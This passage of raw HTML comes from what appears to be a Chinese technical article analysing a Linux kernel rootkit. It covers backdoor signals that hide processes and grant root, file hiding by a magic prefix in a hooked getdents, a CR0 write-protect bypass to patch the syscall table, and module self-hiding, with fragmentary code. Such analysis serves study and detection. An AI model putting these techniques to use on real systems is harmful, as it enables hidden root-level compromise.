style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">拦截自定义信号</span></font><span leaf="">, 实现后门功能</span></span></p></td></tr></tbody></table><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">自定义后门信号</span></span></p><table style="border-collapse:collapse;width:426.1000pt;border:none;mso-border-left-alt:0.5000pt solid rgb(223,226,229);mso-border-top-alt:0.5000pt solid rgb(223,226,229);mso-border-right-alt:0.5000pt solid rgb(223,226,229);mso-border-bottom-alt:0.5000pt solid rgb(223,226,229);mso-padding-alt:0.0000pt 0.0000pt 0.0000pt 0.0000pt;"><tbody><tr><td data-colwidth="162" width="162" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium;border-style: solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">信号</span></font></span></b></p></td><td data-colwidth="75" width="75" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">编号</span></font></span></b></p></td><td data-colwidth="614" width="614" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">功能</span></font></span></b></p></td></tr><tr><td data-colwidth="162" width="162" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt;border-style: solid;border-color: rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">SIGINVIS</span></span></p></td><td data-colwidth="75" width="75" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt 1pt medium;border-style: solid solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin: 0pt;text-indent: 0pt;text-align: center;"><span style="font-family: 宋体;font-size: 12pt;"><span leaf="">41</span></span></p></td><td data-colwidth="614" width="614" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt 1pt medium;border-style: solid solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">设置进程</span></font></span><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">PF_INVISIBLE</span></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">标志</span></font><font face="宋体"><span leaf="">→ 从 </span></font></span><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">ps</span></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">/</span></span><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">top</span></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">/</span></span><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">/proc</span></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">中隐藏进程</span></font></span></p></td></tr><tr><td data-colwidth="162" width="162" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">SIGSUPER</span></span></p></td><td data-colwidth="75" width="75" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin: 0pt;text-indent: 0pt;text-align: center;"><span style="font-family: 宋体;font-size: 12pt;"><span leaf="">54</span></span></p></td><td data-colwidth="614" width="614" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">修改</span></font><span leaf=""> cred 结构 → 直接获取 root 权限 (</span></span><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">uid=0,gid=0,suid=0,...</span></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">)</span></span></p></td></tr><tr><td data-colwidth="162" width="162" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">SIGMODINVIS</span></span></p></td><td data-colwidth="75" width="75" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin: 0pt;text-indent: 0pt;text-align: center;"><span style="font-family: 宋体;font-size: 12pt;"><span leaf="">53</span></span></p></td><td data-colwidth="614" width="614" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">从内核模块链表</span></font></span><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">list_del</span></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">→ 从 </span></font></span><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">lsmod</span></span><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">中隐藏自身</span></font></span></p></td></tr></tbody></table><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);word-break: break-all;box-sizing: border-box;"><span textstyle="" style="font-weight: bold;">文件/目录隐藏</span></span><span leaf="">：任何以 $hhide (默认 ad12e85f) 为前缀的文件/目录在 ls/find/readdir 中不可见:</span></p><p style="margin-left: 0pt;border-width: 1pt;border-style: solid;border-color: rgb(231, 234, 237);padding: 4pt 2pt 3pt;background: rgb(248, 248, 248);" data-pm-slice="0 0 []"><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(85,85,85);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><a class="wx_topic_link" topic-id="mp2ifnwd-lfhr3f" style="color: #576B95 !important;" data-topic="1" data-recommend="">#define</a> MAGIC_PREFIX &#34;ad12e85f&#34;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">// 在 hacked_getdents 中:</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(119,0,136);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">if</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""> (</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">memcmp</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">(</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">MAGIC_PREFIX</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">, </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">dir</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">-&gt;</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">d_name</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">, </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">strlen</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">(</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">MAGIC_PREFIX</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">)) </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">==</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(17,102,68);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">0</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">) {</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">// 从返回结果中移除此条目</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">}</span></span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">同时, 以数字命名的进程 ID 也会在 /proc 中被隐藏 (通过 is_invisible 检查 PF_INVISIBLE 标志)。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">内存保护绕过</span></span></p><p style="margin-left: 0pt;border-width: 1pt;border-style: solid;border-color: rgb(231, 234, 237);padding: 4pt 2pt 3pt;background: rgb(248, 248, 248);" data-pm-slice="0 0 []"><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">// x86/x86_64: 修改 CR0 寄存器绕过写保护</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">cr0</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(152,26,26);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">=</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">read_cr0</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">();</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">unprotect_memory</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">();   </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">// write_cr0(cr0 &amp; ~0x00010000)</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">// 修改系统调用表...</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">protect_memory</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">();     </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">// write_cr0(cr0)</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">// ARM64: 直接修改页表权限</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">update_mapping_prot</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">(</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">phys</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">, </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">virt</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">, </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">size</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">, </span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">PAGE_KERNEL</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">);</span></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">自隐藏技术</span></span></p><p style="margin-left: 0pt;border-width: 1pt;border-style: solid;border-color: rgb(231, 234, 237);padding: 4pt 2pt 3pt;background: rgb(248, 248, 248);" data-pm-slice="0 0 []"><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(170,85,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">// 从内核模块链表中删除自身</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">module_hide</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">() {</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(51,51,51);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf=""><br/></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:var(--monospace);color:rgb(0,0,0);letter-spacing:0.0000pt;text-transform:none;font-style:normal;font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(248,248,248);mso-shading:rgb(248,248,248);"><span leaf="">module_previous</span></span><span 